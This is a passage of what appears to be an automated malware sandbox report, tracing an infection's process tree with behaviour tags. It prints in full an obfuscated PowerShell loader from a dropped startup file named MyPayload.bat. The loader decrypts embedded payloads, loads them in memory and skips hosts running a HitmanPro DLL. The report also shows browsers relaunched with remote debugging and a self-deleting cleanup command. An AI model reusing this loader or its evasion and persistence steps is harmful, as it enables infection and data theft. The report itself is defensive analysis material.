C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff87d6246f8,0x7ff87d624708,0x7ff87d6247186⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:1648
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2108,3413827167237461882,3100887256034786349,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2136 /prefetch:26⤵PID:808
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2108,3413827167237461882,3100887256034786349,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2196 /prefetch:36⤵PID:2668
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2108,3413827167237461882,3100887256034786349,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2888 /prefetch:86⤵PID:4084
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2108,3413827167237461882,3100887256034786349,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3392 /prefetch:16⤵
- Uses browser remote debugging
PID:4468
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2108,3413827167237461882,3100887256034786349,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3400 /prefetch:16⤵
- Uses browser remote debugging
PID:1164
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2108,3413827167237461882,3100887256034786349,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4804 /prefetch:16⤵
- Uses browser remote debugging
PID:812
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2108,3413827167237461882,3100887256034786349,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4956 /prefetch:16⤵
- Uses browser remote debugging
PID:5072
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\6fcjw" & exit5⤵
- System Location Discovery: System Language Discovery
PID:3840 -
C:\Windows\SysWOW64\timeout.exetimeout /t 106⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:5808
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2952 -s 9684⤵
- Program crash
PID:1048
-
-
-
C:\Users\Admin\AppData\Local\Temp\1086784001\DTQCxXZ.exe"C:\Users\Admin\AppData\Local\Temp\1086784001\DTQCxXZ.exe"3⤵
- Executes dropped EXE
PID:5400
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\Admin\AppData\Local\Temp\1086785041\tYliuwV.ps1"3⤵
- Command and Scripting Interpreter: PowerShell
- Drops startup file
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:5480 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyPayload.bat"4⤵
- System Location Discovery: System Language Discovery
PID:6556 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyPayload.bat';$MoqZ='DeKyLvcoKyLvmprKyLveKyLvssKyLv'.Replace('KyLv', ''),'EJwaGlemJwaGeJwaGnJwaGtJwaGAtJwaG'.Replace('JwaG', ''),'CrgSdPegSdPagSdPtgSdPegSdPDecgSdPrypgSdPtorgSdP'.Replace('gSdP', ''),'EnAUSatAUSaryAUSaPAUSaoiAUSantAUSa'.Replace('AUSa', ''),'RifKyeaifKydifKyLiifKyneifKysifKy'.Replace('ifKy', ''),'CoIpkTpyIpkTTIpkToIpkT'.Replace('IpkT', ''),'LRxQFoRxQFaRxQFdRxQF'.Replace('RxQF', ''),'ChPYPIanPYPIgPYPIePYPIExPYPItenPYPIsioPYPInPYPI'.Replace('PYPI', ''),'SplhjTaihjTathjTa'.Replace('hjTa', ''),'IVERYnvoVERYkeVERY'.Replace('VERY', ''),'MaGACXinMGACXoduGACXlGACXeGACX'.Replace('GACX', ''),'GetEffVCuEffVrreEffVnEffVtPEffVroEffVceEffVsEffVsEffV'.Replace('EffV', ''),'TrgFlMagFlMnsgFlMfogFlMrmgFlMFingFlMalgFlMBgFlMlogFlMcgFlMkgFlM'.Replace('gFlM', ''),'FZnjbroZnjbmBaZnjbseZnjb64ZnjbSZnjbtZnjbrinZnjbgZnjb'.Replace('Znjb', '');powershell -w hidden;$modules=[System.Diagnostics.Process]::($MoqZ[11])().Modules;if ($modules -match 'hmpalert.dll') { exit; };function OcByW($zyHkO){$MahHK=[System.Security.Cryptography.Aes]::Create();$MahHK.Mode=[System.Security.Cryptography.CipherMode]::CBC;$MahHK.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$MahHK.Key=[System.Convert]::($MoqZ[13])('AAMGkknb01QKxJVl43m9//ZRwVkG6pEiu9VVo6uyG5U=');$MahHK.IV=[System.Convert]::($MoqZ[13])('/W6oLxKJHKSzHfvUm38XsQ==');$RyLXH=$MahHK.($MoqZ[2])();$Vocox=$RyLXH.($MoqZ[12])($zyHkO,0,$zyHkO.Length);$RyLXH.Dispose();$MahHK.Dispose();$Vocox;}function dAZyU($zyHkO){$CHeOb=New-Object System.IO.MemoryStream(,$zyHkO);$PxKaw=New-Object System.IO.MemoryStream;$ikNUp=New-Object System.IO.Compression.GZipStream($CHeOb,[IO.Compression.CompressionMode]::($MoqZ[0]));$ikNUp.($MoqZ[5])($PxKaw);$ikNUp.Dispose();$CHeOb.Dispose();$PxKaw.Dispose();$PxKaw.ToArray();}$ygeKx=[System.IO.File]::($MoqZ[4])([Console]::Title);$WLLeN=dAZyU (OcByW ([Convert]::($MoqZ[13])([System.Linq.Enumerable]::($MoqZ[1])($ygeKx, 5).Substring(2))));$PCQGF=dAZyU (OcByW ([Convert]::($MoqZ[13])([System.Linq.Enumerable]::($MoqZ[1])($ygeKx, 6).Substring(2))));[System.Reflection.Assembly]::($MoqZ[6])([byte[]]$PCQGF).($MoqZ[3]).($MoqZ[9])($null,$null);[System.Reflection.Assembly]::($MoqZ[6])([byte[]]$WLLeN).($MoqZ[3]).($MoqZ[9])($null,$null); "5⤵
- System Location Discovery: System Language Discovery
PID:6664
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe5⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:6672 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden6⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:7120
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1086786001\oVpNTUm.exe"C:\Users\Admin\AppData\Local\Temp\1086786001\oVpNTUm.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:6528
-
-
C:\Users\Admin\AppData\Local\Temp\1086787001\qFqSpAp.exe"C:\Users\Admin\AppData\Local\Temp\1086787001\qFqSpAp.exe"3⤵
- Executes dropped EXE
PID:5488
-
-
C:\Users\Admin\AppData\Local\Temp\1086788001\Bjkm5hE.exe"C:\Users\Admin\AppData\Local\Temp\1086788001\Bjkm5hE.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:5860 -
C:\Users\Admin\AppData\Local\Temp\1086788001\Bjkm5hE.exe"C:\Users\Admin\AppData\Local\Temp\1086788001\Bjkm5hE.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5992
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5860 -s 9684⤵
- Program crash
PID:5336
-
-
-
C:\Users\Admin\AppData\Local\Temp\1086789001\C3hYpvm.exe"C:\Users\Admin\AppData\Local\Temp\1086789001\C3hYpvm.exe"3⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:5228
-
-
C:\Users\Admin\AppData\Local\Temp\1086790001\f194fe0c36.exe"C:\Users\Admin\AppData\Local\Temp\1086790001\f194fe0c36.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
PID:2872 -
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"4⤵
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
PID:4892
-
-
-
C:\Users\Admin\AppData\Local\Temp\1086791001\7741754b5d.exe"C:\Users\Admin\AppData\Local\Temp\1086791001\7741754b5d.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
PID:5852 -
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"4⤵
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
PID:4568
-
-
-
C:\Users\Admin\AppData\Local\Temp\1086792001\2b2e2cbb7c.exe"C:\Users\Admin\AppData\Local\Temp\1086792001\2b2e2cbb7c.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:6972
-
-
C:\Users\Admin\AppData\Local\Temp\1086793001\6349744b39.exe"C:\Users\Admin\AppData\Local\Temp\1086793001\6349744b39.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:5232
-
-
C:\Users\Admin\AppData\Local\Temp\1086794001\5567323d7a.exe"C:\Users\Admin\AppData\Local\Temp\1086794001\5567323d7a.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Checks processor information in registry
PID:6872 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6872 -s 15204⤵
- Program crash
PID:7044
-
-
-
C:\Users\Admin\AppData\Local\Temp\1086795001\457170dfca.exe"C:\Users\Admin\AppData\Local\Temp\1086795001\457170dfca.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:6648
-
-
C:\Users\Admin\AppData\Local\Temp\1086796001\4b2bea3bb2.exe"C:\Users\Admin\AppData\Local\Temp\1086796001\4b2bea3bb2.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Checks processor information in registry
PID:5000 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""4⤵
- Uses browser remote debugging
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
PID:5924 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ff87fbbcc40,0x7ff87fbbcc4c,0x7ff87fbbcc585⤵PID:6280
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1948,i,17129218241726006661,16970695937275047412,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=1944 /prefetch:25⤵PID:5284
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1876,i,17129218241726006661,16970695937275047412,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2104 /prefetch:35⤵PID:6148
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=1596,i,17129218241726006661,16970695937275047412,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2452 /prefetch:85⤵PID:5316
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3180,i,17129218241726006661,16970695937275047412,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3200 /prefetch:15⤵
- Uses browser remote debugging
PID:6544
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3208,i,17129218241726006661,16970695937275047412,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3248 /prefetch:15⤵
- Uses browser remote debugging
PID:3912
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4572,i,17129218241726006661,16970695937275047412,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3628 /prefetch:15⤵
- Uses browser remote debugging
PID:808
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4768,i,17129218241726006661,16970695937275047412,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4760 /prefetch:85⤵PID:5060
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4732,i,17129218241726006661,16970695937275047412,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4908 /prefetch:85⤵PID:5996
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory="Default"4⤵
- Uses browser remote debugging
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
PID:2004 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ff8967d46f8,0x7ff8967d4708,0x7ff8967d47185⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:3768
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2144,13254879710718558422,17984244814760661156,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2152 /prefetch:25⤵PID:6944
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2144,13254879710718558422,17984244814760661156,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2280 /prefetch:35⤵PID:2504
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2144,13254879710718558422,17984244814760661156,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2992 /prefetch:85⤵PID:5128
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2144,13254879710718558422,17984244814760661156,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3304 /prefetch:15⤵
- Uses browser remote debugging
PID:2964
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2144,13254879710718558422,17984244814760661156,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3324 /prefetch:15⤵
- Uses browser remote debugging
PID:5136
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2144,13254879710718558422,17984244814760661156,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2228 /prefetch:25⤵PID:6860
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2144,13254879710718558422,17984244814760661156,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2136 /prefetch:25⤵PID:2972
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2144,13254879710718558422,17984244814760661156,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2896 /prefetch:25⤵PID:1260
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2144,13254879710718558422,17984244814760661156,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=4872 /prefetch:25⤵PID:4240
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2144,13254879710718558422,17984244814760661156,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2232 /prefetch:25⤵PID:2068
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2144,13254879710718558422,17984244814760661156,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=2568 /prefetch:25⤵PID:2380
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2144,13254879710718558422,17984244814760661156,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=2136 /prefetch:25⤵PID:6972
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2144,13254879710718558422,17984244814760661156,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4876 /prefetch:15⤵
- Uses browser remote debugging
PID:1972
-
-
